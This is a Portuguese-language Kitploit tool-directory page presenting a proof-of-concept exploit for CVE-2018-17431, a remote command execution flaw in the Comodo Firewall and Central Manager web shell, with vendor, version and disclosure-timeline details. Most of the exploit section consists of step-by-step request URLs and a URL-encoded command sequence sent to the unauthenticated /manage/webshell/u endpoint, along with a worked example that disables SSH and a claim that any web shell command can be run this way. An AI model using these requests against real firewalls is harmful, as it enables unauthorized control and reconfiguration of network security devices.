Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fadavvi/cve-2018-17431-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoArchived
GitHubfadavvi/cve-2018-17431-poc

CVE-2018-17431-PoC

Prova de conceito para CVE-2018-17431

Ver Repositório
231há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-17431-PoC

Prova de conceito para CVE-2018-17431

Título do Exploit: Comodo Firewall & Central Manager (UTM) Todas as versões anteriores a 2.7.0 e 1.5.0 Execução Remota de Comandos (baseado em Web Shell)

Autor do Exploit: Milad Fadavvi

Página do Fornecedor: https://www.comodo.com/

Link do Software: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Versão: anteriores a 2.7.0 e 1.5.0

Testado em: Windows:firefox/chrome - Kali:firefox

Data da Descoberta: 2018-08-15 (relatado no mesmo dia)

Confirmação da existência do bug: 2018-09-22 (Ticket ID: XWR-503-79437)

Patch lançado: 2018-11-23 Notas de Lançamento da Comodo

Exploit:

  1. Simulação de WebShell:

    root@kitploit:~
     Por exemplo, desabilitar SSH no web shell é assim:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Codificar

    root@kitploit:~
     Codifique a sequência acima com codificação de URL.
     (Usei o plugin encoder do Burp)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Executar

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (tecla enter extra para executar o comando)
               
    
     Exemplo: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Uma página com a mensagem "Configuration has been altered" aparecerá e a configuração será alterada!

Com esta técnica, podemos simular todos os comandos do WebShell.

Baixar ferramenta